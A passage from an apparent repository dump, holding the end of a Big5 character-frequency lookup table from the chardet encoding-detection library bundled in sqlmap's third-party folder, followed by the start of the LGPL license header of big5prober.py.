1056\n3698,2718,1139,1820,4234,2022,1124,2164,2791,1778,2659,5105,3097, 363,1655,3214, # 1072\n5106,2993,5107,5108,5109,3992,1567,3993, 718, 103,3215, 849,1443, 341,3357,2949, # 1088\n1484,5110,1712, 127,  67, 339,4235,2403, 679,1412, 821,5111,5112, 834, 738, 351, # 1104\n2994,2147, 846, 235,1497,1881, 418,1993,3828,2719, 186,1100,2148,2756,3575,1545, # 1120\n1355,2950,2872,1377, 583,3994,4236,2581,2995,5113,1298,3699,1078,2557,3700,2363, # 1136\n  78,3829,3830, 267,1289,2100,2002,1594,4237, 348, 369,1274,2197,2178,1838,4552, # 1152\n1821,2830,3701,2757,2288,2003,4553,2951,2758, 144,3358, 882,4554,3995,2759,3470, # 1168\n4555,2915,5114,4238,1726, 320,5115,3996,3046, 788,2996,5116,2831,1774,1327,2873, # 1184\n3997,2832,5117,1306,4556,2004,1700,3831,3576,2364,2660, 787,2023, 506, 824,3702, # 1200\n 534, 323,4557,1044,3359,2024,1901, 946,3471,5118,1779,1500,1678,5119,1882,4558, # 1216\n 165, 243,4559,3703,2528, 123, 683,4239, 764,4560,  36,3998,1793, 589,2916, 816, # 1232\n 626,1667,3047,2237,1639,1555,1622,3832,3999,5120,4000,2874,1370,1228,1933, 891, # 1248\n2084,2917, 304,4240,5121, 292,2997,2720,3577, 691,2101,4241,1115,4561, 118, 662, # 1264\n5122, 611,1156, 854,2386,1316,2875,   2, 386, 515,2918,5123,5124,3286, 868,2238, # 1280\n1486, 855,2661, 785,2216,3048,5125,1040,3216,3578,5126,3146, 448,5127,1525,5128, # 1296\n2165,4562,5129,3833,5130,4242,2833,3579,3147, 503, 818,4001,3148,1568, 814, 676, # 1312\n1444, 306,1749,5131,3834,1416,1030, 197,1428, 805,2834,1501,4563,5132,5133,5134, # 1328\n1994,5135,4564,5136,5137,2198,  13,2792,3704,2998,3149,1229,1917,5138,3835,2132, # 1344\n5139,4243,4565,2404,3580,5140,2217,1511,1727,1120,5141,5142, 646,3836,2448, 307, # 1360\n5143,5144,1595,3217,5145,5146,5147,3705,1113,1356,4002,1465,2529,2530,5148, 519, # 1376\n5149, 128,2133,  92,2289,1980,5150,4003,1512, 342,3150,2199,5151,2793,2218,1981, # 1392\n3360,4244, 290,1656,1317, 789, 827,2365,5152,3837,4566, 562, 581,4004,5153, 401, # 1408\n4567,2252,  94,4568,5154,1399,2794,5155,1463,2025,4569,3218,1944,5156, 828,1105, # 1424\n4245,1262,1394,5157,4246, 605,4570,5158,1784,2876,5159,2835, 819,2102, 578,2200, # 1440\n2952,5160,1502, 436,3287,4247,3288,2836,4005,2919,3472,3473,5161,2721,2320,5162, # 1456\n5163,2337,2068,  23,4571, 193, 826,3838,2103, 699,1630,4248,3098, 390,1794,1064, # 1472\n3581,5164,1579,3099,3100,1400,5165,4249,1839,1640,2877,5166,4572,4573, 137,4250, # 1488\n 598,3101,1967, 780, 104, 974,2953,5167, 278, 899, 253, 402, 572, 504, 493,1339, # 1504\n5168,4006,1275,4574,2582,2558,5169,3706,3049,3102,2253, 565,1334,2722, 863,  41, # 1520\n5170,5171,4575,5172,1657,2338,  19, 463,2760,4251, 606,5173,2999,3289,1087,2085, # 1536\n1323,2662,3000,5174,1631,1623,1750,4252,2691,5175,2878, 791,2723,2663,2339, 232, # 1552\n2421,5176,3001,1498,5177,2664,2630, 755,1366,3707,3290,3151,2026,1609, 119,1918, # 1568\n3474, 862,1026,4253,5178,4007,3839,4576,4008,4577,2265,1952,2477,5179,1125, 817, # 1584\n4254,4255,4009,1513,1766,2041,1487,4256,3050,3291,2837,3840,3152,5180,5181,1507, # 1600\n5182,2692, 733,  40,1632,1106,2879, 345,4257, 841,2531, 230,4578,3002,1847,3292, # 1616\n3475,5183,1263, 986,3476,5184, 735, 879, 254,1137, 857, 622,1300,1180,1388,1562, # 1632\n4010,4011,2954, 967,2761,2665,1349, 592,2134,1692,3361,3003,1995,4258,1679,4012, # 1648\n1902,2188,5185, 739,3708,2724,1296,1290,5186,4259,2201,2202,1922,1563,2605,2559, # 1664\n1871,2762,3004,5187, 435,5188, 343,1108, 596,  17,1751,4579,2239,3477,3709,5189, # 1680\n4580, 294,3582,2955,1693, 477, 979, 281,2042,3583, 643,2043,3710,2631,2795,2266, # 1696\n1031,2340,2135,2303,3584,4581, 367,1249,2560,5190,3585,5191,4582,1283,3362,2005, # 1712\n 240,1762,3363,4583,4584, 836,1069,3153, 474,5192,2149,2532, 268,3586,5193,3219, # 1728\n1521,1284,5194,1658,1546,4260,5195,3587,3588,5196,4261,3364,2693,1685,4262, 961, # 1744\n1673,2632, 190,2006,2203,3841,4585,4586,5197, 570,2504,3711,1490,5198,4587,2633, # 1760\n3293,1957,4588, 584,1514, 396,1045,1945,5199,4589,1968,2449,5200,5201,4590,4013, # 1776\n 619,5202,3154,3294, 215,2007,2796,2561,3220,4591,3221,4592, 763,4263,3842,4593, # 1792\n5203,5204,1958,1767,2956,3365,3712,1174, 452,1477,4594,3366,3155,5205,2838,1253, # 1808\n2387,2189,1091,2290,4264, 492,5206, 638,1169,1825,2136,1752,4014, 648, 926,1021, # 1824\n1324,4595, 520,4596, 997, 847,1007, 892,4597,3843,2267,1872,3713,2405,1785,4598, # 1840\n1953,2957,3103,3222,1728,4265,2044,3714,4599,2008,1701,3156,1551,  30,2268,4266, # 1856\n5207,2027,4600,3589,5208, 501,5209,4267, 594,3478,2166,1822,3590,3479,3591,3223, # 1872\n 829,2839,4268,5210,1680,3157,1225,4269,5211,3295,4601,4270,3158,2341,5212,4602, # 1888\n4271,5213,4015,4016,5214,1848,2388,2606,3367,5215,4603, 374,4017, 652,4272,4273, # 1904\n 375,1140, 798,5216,5217,5218,2366,4604,2269, 546,1659, 138,3051,2450,4605,5219, # 1920\n2254, 612,1849, 910, 796,3844,1740,1371, 825,3845,3846,5220,2920,2562,5221, 692, # 1936\n 444,3052,2634, 801,4606,4274,5222,1491, 244,1053,3053,4275,4276, 340,5223,4018, # 1952\n1041,3005, 293,1168,  87,1357,5224,1539, 959,5225,2240, 721, 694,4277,3847, 219, # 1968\n1478, 644,1417,3368,2666,1413,1401,1335,1389,4019,5226,5227,3006,2367,3159,1826, # 1984\n 730,1515, 184,2840,  66,4607,5228,1660,2958, 246,3369, 378,1457, 226,3480, 975, # 2000\n4020,2959,1264,3592, 674, 696,5229, 163,5230,1141,2422,2167, 713,3593,3370,4608, # 2016\n4021,5231,5232,1186,  15,5233,1079,1070,5234,1522,3224,3594, 276,1050,2725, 758, # 2032\n1126, 653,2960,3296,5235,2342, 889,3595,4022,3104,3007, 903,1250,4609,4023,3481, # 2048\n3596,1342,1681,1718, 766,3297, 286,  89,2961,3715,5236,1713,5237,2607,3371,3008, # 2064\n5238,2962,2219,3225,2880,5239,4610,2505,2533, 181, 387,1075,4024, 731,2190,3372, # 2080\n5240,3298, 310, 313,3482,2304, 770,4278,  54,3054, 189,4611,3105,3848,4025,5241, # 2096\n1230,1617,1850, 355,3597,4279,4612,3373, 111,4280,3716,1350,3160,3483,3055,4281, # 2112\n2150,3299,3598,5242,2797,4026,4027,3009, 722,2009,5243,1071, 247,1207,2343,2478, # 2128\n1378,4613,2010, 864,1437,1214,4614, 373,3849,1142,2220, 667,4615, 442,2763,2563, # 2144\n3850,4028,1969,4282,3300,1840, 837, 170,1107, 934,1336,1883,5244,5245,2119,4283, # 2160\n2841, 743,1569,5246,4616,4284, 582,2389,1418,3484,5247,1803,5248, 357,1395,1729, # 2176\n3717,3301,2423,1564,2241,5249,3106,3851,1633,4617,1114,2086,4285,1532,5250, 482, # 2192\n2451,4618,5251,5252,1492, 833,1466,5253,2726,3599,1641,2842,5254,1526,1272,3718, # 2208\n4286,1686,1795, 416,2564,1903,1954,1804,5255,3852,2798,3853,1159,2321,5256,2881, # 2224\n4619,1610,1584,3056,2424,2764, 443,3302,1163,3161,5257,5258,4029,5259,4287,2506, # 2240\n3057,4620,4030,3162,2104,1647,3600,2011,1873,4288,5260,4289, 431,3485,5261, 250, # 2256\n  97,  81,4290,5262,1648,1851,1558, 160, 848,5263, 866, 740,1694,5264,2204,2843, # 2272\n3226,4291,4621,3719,1687, 950,2479, 426, 469,3227,3720,3721,4031,5265,5266,1188, # 2288\n 424,1996, 861,3601,4292,3854,2205,2694, 168,1235,3602,4293,5267,2087,1674,4622, # 2304\n3374,3303, 220,2565,1009,5268,3855, 670,3010, 332,1208, 717,5269,5270,3603,2452, # 2320\n4032,3375,5271, 513,5272,1209,2882,3376,3163,4623,1080,5273,5274,5275,5276,2534, # 2336\n3722,3604, 815,1587,4033,4034,5277,3605,3486,3856,1254,4624,1328,3058,1390,4035, # 2352\n1741,4036,3857,4037,5278, 236,3858,2453,3304,5279,5280,3723,3859,1273,3860,4625, # 2368\n5281, 308,5282,4626, 245,4627,1852,2480,1307,2583, 430, 715,2137,2454,5283, 270, # 2384\n 199,2883,4038,5284,3606,2727,1753, 761,1754, 725,1661,1841,4628,3487,3724,5285, # 2400\n5286, 587,  14,3305, 227,2608, 326, 480,2270, 943,2765,3607, 291, 650,1884,5287, # 2416\n1702,1226, 102,1547,  62,3488, 904,4629,3489,1164,4294,5288,5289,1224,1548,2766, # 2432\n 391, 498,1493,5290,1386,1419,5291,2056,1177,4630, 813, 880,1081,2368, 566,1145, # 2448\n4631,2291,1001,1035,2566,2609,2242, 394,1286,5292,5293,2069,5294,  86,1494,1730, # 2464\n4039, 491,1588, 745, 897,2963, 843,3377,4040,2767,2884,3306,1768, 998,2221,2070, # 2480\n 397,1827,1195,1970,3725,3011,3378, 284,5295,3861,2507,2138,2120,1904,5296,4041, # 2496\n2151,4042,4295,1036,3490,1905, 114,2567,4296, 209,1527,5297,5298,2964,2844,2635, # 2512\n2390,2728,3164, 812,2568,5299,3307,5300,1559, 737,1885,3726,1210, 885,  28,2695, # 2528\n3608,3862,5301,4297,1004,1780,4632,5302, 346,1982,2222,2696,4633,3863,1742, 797, # 2544\n1642,4043,1934,1072,1384,2152, 896,4044,3308,3727,3228,2885,3609,5303,2569,1959, # 2560\n4634,2455,1786,5304,5305,5306,4045,4298,1005,1308,3728,4299,2729,4635,4636,1528, # 2576\n2610, 161,1178,4300,1983, 987,4637,1101,4301, 631,4046,1157,3229,2425,1343,1241, # 2592\n1016,2243,2570, 372, 877,2344,2508,1160, 555,1935, 911,4047,5307, 466,1170, 169, # 2608\n1051,2921,2697,3729,2481,3012,1182,2012,2571,1251,2636,5308, 992,2345,3491,1540, # 2624\n2730,1201,2071,2406,1997,2482,5309,4638, 528,1923,2191,1503,1874,1570,2369,3379, # 2640\n3309,5310, 557,1073,5311,1828,3492,2088,2271,3165,3059,3107, 767,3108,2799,4639, # 2656\n1006,4302,4640,2346,1267,2179,3730,3230, 778,4048,3231,2731,1597,2667,5312,4641, # 2672\n5313,3493,5314,5315,5316,3310,2698,1433,3311, 131,  95,1504,4049, 723,4303,3166, # 2688\n1842,3610,2768,2192,4050,2028,2105,3731,5317,3013,4051,1218,5318,3380,3232,4052, # 2704\n4304,2584, 248,1634,3864, 912,5319,2845,3732,3060,3865, 654,  53,5320,3014,5321, # 2720\n1688,4642, 777,3494,1032,4053,1425,5322, 191, 820,2121,2846, 971,4643, 931,3233, # 2736\n 135, 664, 783,3866,1998, 772,2922,1936,4054,3867,4644,2923,3234, 282,2732, 640, # 2752\n1372,3495,1127, 922, 325,3381,5323,5324, 711,2045,5325,5326,4055,2223,2800,1937, # 2768\n4056,3382,2224,2255,3868,2305,5327,4645,3869,1258,3312,4057,3235,2139,2965,4058, # 2784\n4059,5328,2225, 258,3236,4646, 101,1227,5329,3313,1755,5330,1391,3314,5331,2924, # 2800\n2057, 893,5332,5333,5334,1402,4305,2347,5335,5336,3237,3611,5337,5338, 878,1325, # 2816\n1781,2801,4647, 259,1385,2585, 744,1183,2272,4648,5339,4060,2509,5340, 684,1024, # 2832\n4306,5341, 472,3612,3496,1165,3315,4061,4062, 322,2153, 881, 455,1695,1152,1340, # 2848\n 660, 554,2154,4649,1058,4650,4307, 830,1065,3383,4063,4651,1924,5342,1703,1919, # 2864\n5343, 932,2273, 122,5344,4652, 947, 677,5345,3870,2637, 297,1906,1925,2274,4653, # 2880\n2322,3316,5346,5347,4308,5348,4309,  84,4310, 112, 989,5349, 547,1059,4064, 701, # 2896\n3613,1019,5350,4311,5351,3497, 942, 639, 457,2306,2456, 993,2966, 407, 851, 494, # 2912\n4654,3384, 927,5352,1237,5353,2426,3385, 573,4312, 680, 921,2925,1279,1875, 285, # 2928\n 790,1448,1984, 719,2168,5354,5355,4655,4065,4066,1649,5356,1541, 563,5357,1077, # 2944\n5358,3386,3061,3498, 511,3015,4067,4068,3733,4069,1268,2572,3387,3238,4656,4657, # 2960\n5359, 535,1048,1276,1189,2926,2029,3167,1438,1373,2847,2967,1134,2013,5360,4313, # 2976\n1238,2586,3109,1259,5361, 700,5362,2968,3168,3734,4314,5363,4315,1146,1876,1907, # 2992\n4658,2611,4070, 781,2427, 132,1589, 203, 147, 273,2802,2407, 898,1787,2155,4071, # 3008\n4072,5364,3871,2803,5365,5366,4659,4660,5367,3239,5368,1635,3872, 965,5369,1805, # 3024\n2699,1516,3614,1121,1082,1329,3317,4073,1449,3873,  65,1128,2848,2927,2769,1590, # 3040\n3874,5370,5371,  12,2668,  45, 976,2587,3169,4661, 517,2535,1013,1037,3240,5372, # 3056\n3875,2849,5373,3876,5374,3499,5375,2612, 614,1999,2323,3877,3110,2733,2638,5376, # 3072\n2588,4316, 599,1269,5377,1811,3735,5378,2700,3111, 759,1060, 489,1806,3388,3318, # 3088\n1358,5379,5380,2391,1387,1215,2639,2256, 490,5381,5382,4317,1759,2392,2348,5383, # 3104\n4662,3878,1908,4074,2640,1807,3241,4663,3500,3319,2770,2349, 874,5384,5385,3501, # 3120\n3736,1859,  91,2928,3737,3062,3879,4664,5386,3170,4075,2669,5387,3502,1202,1403, # 3136\n3880,2969,2536,1517,2510,4665,3503,2511,5388,4666,5389,2701,1886,1495,1731,4076, # 3152\n2370,4667,5390,2030,5391,5392,4077,2702,1216, 237,2589,4318,2324,4078,3881,4668, # 3168\n4669,2703,3615,3504, 445,4670,5393,5394,5395,5396,2771,  61,4079,3738,1823,4080, # 3184\n5397, 687,2046, 935, 925, 405,2670, 703,1096,1860,2734,4671,4081,1877,1367,2704, # 3200\n3389, 918,2106,1782,2483, 334,3320,1611,1093,4672, 564,3171,3505,3739,3390, 945, # 3216\n2641,2058,4673,5398,1926, 872,4319,5399,3506,2705,3112, 349,4320,3740,4082,4674, # 3232\n3882,4321,3741,2156,4083,4675,4676,4322,4677,2408,2047, 782,4084, 400, 251,4323, # 3248\n1624,5400,5401, 277,3742, 299,1265, 476,1191,3883,2122,4324,4325,1109, 205,5402, # 3264\n2590,1000,2157,3616,1861,5403,5404,5405,4678,5406,4679,2573, 107,2484,2158,4085, # 3280\n3507,3172,5407,1533, 541,1301, 158, 753,4326,2886,3617,5408,1696, 370,1088,4327, # 3296\n4680,3618, 579, 327, 440, 162,2244, 269,1938,1374,3508, 968,3063,  56,1396,3113, # 3312\n2107,3321,3391,5409,1927,2159,4681,3016,5410,3619,5411,5412,3743,4682,2485,5413, # 3328\n2804,5414,1650,4683,5415,2613,5416,5417,4086,2671,3392,1149,3393,4087,3884,4088, # 3344\n5418,1076,  49,5419, 951,3242,3322,3323, 450,2850, 920,5420,1812,2805,2371,4328, # 3360\n1909,1138,2372,3885,3509,5421,3243,4684,1910,1147,1518,2428,4685,3886,5422,4686, # 3376\n2393,2614, 260,1796,3244,5423,5424,3887,3324, 708,5425,3620,1704,5426,3621,1351, # 3392\n1618,3394,3017,1887, 944,4329,3395,4330,3064,3396,4331,5427,3744, 422, 413,1714, # 3408\n3325, 500,2059,2350,4332,2486,5428,1344,1911, 954,5429,1668,5430,5431,4089,2409, # 3424\n4333,3622,3888,4334,5432,2307,1318,2512,3114, 133,3115,2887,4687, 629,  31,2851, # 3440\n2706,3889,4688, 850, 949,4689,4090,2970,1732,2089,4335,1496,1853,5433,4091, 620, # 3456\n3245, 981,1242,3745,3397,1619,3746,1643,3326,2140,2457,1971,1719,3510,2169,5434, # 3472\n3246,5435,5436,3398,1829,5437,1277,4690,1565,2048,5438,1636,3623,3116,5439, 869, # 3488\n2852, 655,3890,3891,3117,4092,3018,3892,1310,3624,4691,5440,5441,5442,1733, 558, # 3504\n4692,3747, 335,1549,3065,1756,4336,3748,1946,3511,1830,1291,1192, 470,2735,2108, # 3520\n2806, 913,1054,4093,5443,1027,5444,3066,4094,4693, 982,2672,3399,3173,3512,3247, # 3536\n3248,1947,2807,5445, 571,4694,5446,1831,5447,3625,2591,1523,2429,5448,2090, 984, # 3552\n4695,3749,1960,5449,3750, 852, 923,2808,3513,3751, 969,1519, 999,2049,2325,1705, # 3568\n5450,3118, 615,1662, 151, 597,4095,2410,2326,1049, 275,4696,3752,4337, 568,3753, # 3584\n3626,2487,4338,3754,5451,2430,2275, 409,3249,5452,1566,2888,3514,1002, 769,2853, # 3600\n 194,2091,3174,3755,2226,3327,4339, 628,1505,5453,5454,1763,2180,3019,4096, 521, # 3616\n1161,2592,1788,2206,2411,4697,4097,1625,4340,4341, 412,  42,3119, 464,5455,2642, # 3632\n4698,3400,1760,1571,2889,3515,2537,1219,2207,3893,2643,2141,2373,4699,4700,3328, # 3648\n1651,3401,3627,5456,5457,3628,2488,3516,5458,3756,5459,5460,2276,2092, 460,5461, # 3664\n4701,5462,3020, 962, 588,3629, 289,3250,2644,1116,  52,5463,3067,1797,5464,5465, # 3680\n5466,1467,5467,1598,1143,3757,4342,1985,1734,1067,4702,1280,3402, 465,4703,1572, # 3696\n 510,5468,1928,2245,1813,1644,3630,5469,4704,3758,5470,5471,2673,1573,1534,5472, # 3712\n5473, 536,1808,1761,3517,3894,3175,2645,5474,5475,5476,4705,3518,2929,1912,2809, # 3728\n5477,3329,1122, 377,3251,5478, 360,5479,5480,4343,1529, 551,5481,2060,3759,1769, # 3744\n2431,5482,2930,4344,3330,3120,2327,2109,2031,4706,1404, 136,1468,1479, 672,1171, # 3760\n3252,2308, 271,3176,5483,2772,5484,2050, 678,2736, 865,1948,4707,5485,2014,4098, # 3776\n2971,5486,2737,2227,1397,3068,3760,4708,4709,1735,2931,3403,3631,5487,3895, 509, # 3792\n2854,2458,2890,3896,5488,5489,3177,3178,4710,4345,2538,4711,2309,1166,1010, 552, # 3808\n 681,1888,5490,5491,2972,2973,4099,1287,1596,1862,3179, 358, 453, 736, 175, 478, # 3824\n1117, 905,1167,1097,5492,1854,1530,5493,1706,5494,2181,3519,2292,3761,3520,3632, # 3840\n4346,2093,4347,5495,3404,1193,2489,4348,1458,2193,2208,1863,1889,1421,3331,2932, # 3856\n3069,2182,3521, 595,2123,5496,4100,5497,5498,4349,1707,2646, 223,3762,1359, 751, # 3872\n3121, 183,3522,5499,2810,3021, 419,2374, 633, 704,3897,2394, 241,5500,5501,5502, # 3888\n 838,3022,3763,2277,2773,2459,3898,1939,2051,4101,1309,3122,2246,1181,5503,1136, # 3904\n2209,3899,2375,1446,4350,2310,4712,5504,5505,4351,1055,2615, 484,3764,5506,4102, # 3920\n 625,4352,2278,3405,1499,4353,4103,5507,4104,4354,3253,2279,2280,3523,5508,5509, # 3936\n2774, 808,2616,3765,3406,4105,4355,3123,2539, 526,3407,3900,4356, 955,5510,1620, # 3952\n4357,2647,2432,5511,1429,3766,1669,1832, 994, 928,5512,3633,1260,5513,5514,5515, # 3968\n1949,2293, 741,2933,1626,4358,2738,2460, 867,1184, 362,3408,1392,5516,5517,4106, # 3984\n4359,1770,1736,3254,2934,4713,4714,1929,2707,1459,1158,5518,3070,3409,2891,1292, # 4000\n1930,2513,2855,3767,1986,1187,2072,2015,2617,4360,5519,2574,2514,2170,3768,2490, # 4016\n3332,5520,3769,4715,5521,5522, 666,1003,3023,1022,3634,4361,5523,4716,1814,2257, # 4032\n 574,3901,1603, 295,1535, 705,3902,4362, 283, 858, 417,5524,5525,3255,4717,4718, # 4048\n3071,1220,1890,1046,2281,2461,4107,1393,1599, 689,2575, 388,4363,5526,2491, 802, # 4064\n5527,2811,3903,2061,1405,2258,5528,4719,3904,2110,1052,1345,3256,1585,5529, 809, # 4080\n5530,5531,5532, 575,2739,3524, 956,1552,1469,1144,2328,5533,2329,1560,2462,3635, # 4096\n3257,4108, 616,2210,4364,3180,2183,2294,5534,1833,5535,3525,4720,5536,1319,3770, # 4112\n3771,1211,3636,1023,3258,1293,2812,5537,5538,5539,3905, 607,2311,3906, 762,2892, # 4128\n1439,4365,1360,4721,1485,3072,5540,4722,1038,4366,1450,2062,2648,4367,1379,4723, # 4144\n2593,5541,5542,4368,1352,1414,2330,2935,1172,5543,5544,3907,3908,4724,1798,1451, # 4160\n5545,5546,5547,5548,2936,4109,4110,2492,2351, 411,4111,4112,3637,3333,3124,4725, # 4176\n1561,2674,1452,4113,1375,5549,5550,  47,2974, 316,5551,1406,1591,2937,3181,5552, # 4192\n1025,2142,3125,3182, 354,2740, 884,2228,4369,2412, 508,3772, 726,3638, 996,2433, # 4208\n3639, 729,5553, 392,2194,1453,4114,4726,3773,5554,5555,2463,3640,2618,1675,2813, # 4224\n 919,2352,2975,2353,1270,4727,4115,  73,5556,5557, 647,5558,3259,2856,2259,1550, # 4240\n1346,3024,5559,1332, 883,3526,5560,5561,5562,5563,3334,2775,5564,1212, 831,1347, # 4256\n4370,4728,2331,3909,1864,3073, 720,3910,4729,4730,3911,5565,4371,5566,5567,4731, # 4272\n5568,5569,1799,4732,3774,2619,4733,3641,1645,2376,4734,5570,2938, 669,2211,2675, # 4288\n2434,5571,2893,5572,5573,1028,3260,5574,4372,2413,5575,2260,1353,5576,5577,4735, # 4304\n3183, 518,5578,4116,5579,4373,1961,5580,2143,4374,5581,5582,3025,2354,2355,3912, # 4320\n 516,1834,1454,4117,2708,4375,4736,2229,2620,1972,1129,3642,5583,2776,5584,2976, # 4336\n1422, 577,1470,3026,1524,3410,5585,5586, 432,4376,3074,3527,5587,2594,1455,2515, # 4352\n2230,1973,1175,5588,1020,2741,4118,3528,4737,5589,2742,5590,1743,1361,3075,3529, # 4368\n2649,4119,4377,4738,2295, 895, 924,4378,2171, 331,2247,3076, 166,1627,3077,1098, # 4384\n5591,1232,2894,2231,3411,4739, 657, 403,1196,2377, 542,3775,3412,1600,4379,3530, # 4400\n5592,4740,2777,3261, 576, 530,1362,4741,4742,2540,2676,3776,4120,5593, 842,3913, # 4416\n5594,2814,2032,1014,4121, 213,2709,3413, 665, 621,4380,5595,3777,2939,2435,5596, # 4432\n2436,3335,3643,3414,4743,4381,2541,4382,4744,3644,1682,4383,3531,1380,5597, 724, # 4448\n2282, 600,1670,5598,1337,1233,4745,3126,2248,5599,1621,4746,5600, 651,4384,5601, # 4464\n1612,4385,2621,5602,2857,5603,2743,2312,3078,5604, 716,2464,3079, 174,1255,2710, # 4480\n4122,3645, 548,1320,1398, 728,4123,1574,5605,1891,1197,3080,4124,5606,3081,3082, # 4496\n3778,3646,3779, 747,5607, 635,4386,4747,5608,5609,5610,4387,5611,5612,4748,5613, # 4512\n3415,4749,2437, 451,5614,3780,2542,2073,4388,2744,4389,4125,5615,1764,4750,5616, # 4528\n4390, 350,4751,2283,2395,2493,5617,4391,4126,2249,1434,4127, 488,4752, 458,4392, # 4544\n4128,3781, 771,1330,2396,3914,2576,3184,2160,2414,1553,2677,3185,4393,5618,2494, # 4560\n2895,2622,1720,2711,4394,3416,4753,5619,2543,4395,5620,3262,4396,2778,5621,2016, # 4576\n2745,5622,1155,1017,3782,3915,5623,3336,2313, 201,1865,4397,1430,5624,4129,5625, # 4592\n5626,5627,5628,5629,4398,1604,5630, 414,1866, 371,2595,4754,4755,3532,2017,3127, # 4608\n4756,1708, 960,4399, 887, 389,2172,1536,1663,1721,5631,2232,4130,2356,2940,1580, # 4624\n5632,5633,1744,4757,2544,4758,4759,5634,4760,5635,2074,5636,4761,3647,3417,2896, # 4640\n4400,5637,4401,2650,3418,2815, 673,2712,2465, 709,3533,4131,3648,4402,5638,1148, # 4656\n 502, 634,5639,5640,1204,4762,3649,1575,4763,2623,3783,5641,3784,3128, 948,3263, # 4672\n 121,1745,3916,1110,5642,4403,3083,2516,3027,4132,3785,1151,1771,3917,1488,4133, # 4688\n1987,5643,2438,3534,5644,5645,2094,5646,4404,3918,1213,1407,2816, 531,2746,2545, # 4704\n3264,1011,1537,4764,2779,4405,3129,1061,5647,3786,3787,1867,2897,5648,2018, 120, # 4720\n4406,4407,2063,3650,3265,2314,3919,2678,3419,1955,4765,4134,5649,3535,1047,2713, # 4736\n1266,5650,1368,4766,2858, 649,3420,3920,2546,2747,1102,2859,2679,5651,5652,2000, # 4752\n5653,1111,3651,2977,5654,2495,3921,3652,2817,1855,3421,3788,5655,5656,3422,2415, # 4768\n2898,3337,3266,3653,5657,2577,5658,3654,2818,4135,1460, 856,5659,3655,5660,2899, # 4784\n2978,5661,2900,3922,5662,4408, 632,2517, 875,3923,1697,3924,2296,5663,5664,4767, # 4800\n3028,1239, 580,4768,4409,5665, 914, 936,2075,1190,4136,1039,2124,5666,5667,5668, # 4816\n5669,3423,1473,5670,1354,4410,3925,4769,2173,3084,4137, 915,3338,4411,4412,3339, # 4832\n1605,1835,5671,2748, 398,3656,4413,3926,4138, 328,1913,2860,4139,3927,1331,4414, # 4848\n3029, 937,4415,5672,3657,4140,4141,3424,2161,4770,3425, 524, 742, 538,3085,1012, # 4864\n5673,5674,3928,2466,5675, 658,1103, 225,3929,5676,5677,4771,5678,4772,5679,3267, # 4880\n1243,5680,4142, 963,2250,4773,5681,2714,3658,3186,5682,5683,2596,2332,5684,4774, # 4896\n5685,5686,5687,3536, 957,3426,2547,2033,1931,2941,2467, 870,2019,3659,1746,2780, # 4912\n2781,2439,2468,5688,3930,5689,3789,3130,3790,3537,3427,3791,5690,1179,3086,5691, # 4928\n3187,2378,4416,3792,2548,3188,3131,2749,4143,5692,3428,1556,2549,2297, 977,2901, # 4944\n2034,4144,1205,3429,5693,1765,3430,3189,2125,1271, 714,1689,4775,3538,5694,2333, # 4960\n3931, 533,4417,3660,2184, 617,5695,2469,3340,3539,2315,5696,5697,3190,5698,5699, # 4976\n3932,1988, 618, 427,2651,3540,3431,5700,5701,1244,1690,5702,2819,4418,4776,5703, # 4992\n3541,4777,5704,2284,1576, 473,3661,4419,3432, 972,5705,3662,5706,3087,5707,5708, # 5008\n4778,4779,5709,3793,4145,4146,5710, 153,4780, 356,5711,1892,2902,4420,2144, 408, # 5024\n 803,2357,5712,3933,5713,4421,1646,2578,2518,4781,4782,3934,5714,3935,4422,5715, # 5040\n2416,3433, 752,5716,5717,1962,3341,2979,5718, 746,3030,2470,4783,4423,3794, 698, # 5056\n4784,1893,4424,3663,2550,4785,3664,3936,5719,3191,3434,5720,1824,1302,4147,2715, # 5072\n3937,1974,4425,5721,4426,3192, 823,1303,1288,1236,2861,3542,4148,3435, 774,3938, # 5088\n5722,1581,4786,1304,2862,3939,4787,5723,2440,2162,1083,3268,4427,4149,4428, 344, # 5104\n1173, 288,2316, 454,1683,5724,5725,1461,4788,4150,2597,5726,5727,4789, 985, 894, # 5120\n5728,3436,3193,5729,1914,2942,3795,1989,5730,2111,1975,5731,4151,5732,2579,1194, # 5136\n 425,5733,4790,3194,1245,3796,4429,5734,5735,2863,5736, 636,4791,1856,3940, 760, # 5152\n1800,5737,4430,2212,1508,4792,4152,1894,1684,2298,5738,5739,4793,4431,4432,2213, # 5168\n 479,5740,5741, 832,5742,4153,2496,5743,2980,2497,3797, 990,3132, 627,1815,2652, # 5184\n4433,1582,4434,2126,2112,3543,4794,5744, 799,4435,3195,5745,4795,2113,1737,3031, # 5200\n1018, 543, 754,4436,3342,1676,4796,4797,4154,4798,1489,5746,3544,5747,2624,2903, # 5216\n4155,5748,5749,2981,5750,5751,5752,5753,3196,4799,4800,2185,1722,5754,3269,3270, # 5232\n1843,3665,1715, 481, 365,1976,1857,5755,5756,1963,2498,4801,5757,2127,3666,3271, # 5248\n 433,1895,2064,2076,5758, 602,2750,5759,5760,5761,5762,5763,3032,1628,3437,5764, # 5264\n3197,4802,4156,2904,4803,2519,5765,2551,2782,5766,5767,5768,3343,4804,2905,5769, # 5280\n4805,5770,2864,4806,4807,1221,2982,4157,2520,5771,5772,5773,1868,1990,5774,5775, # 5296\n5776,1896,5777,5778,4808,1897,4158, 318,5779,2095,4159,4437,5780,5781, 485,5782, # 5312\n 938,3941, 553,2680, 116,5783,3942,3667,5784,3545,2681,2783,3438,3344,2820,5785, # 5328\n3668,2943,4160,1747,2944,2983,5786,5787, 207,5788,4809,5789,4810,2521,5790,3033, # 5344\n 890,3669,3943,5791,1878,3798,3439,5792,2186,2358,3440,1652,5793,5794,5795, 941, # 5360\n2299, 208,3546,4161,2020, 330,4438,3944,2906,2499,3799,4439,4811,5796,5797,5798, # 5376\n)\n\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/big5prober.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Communicator client code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU 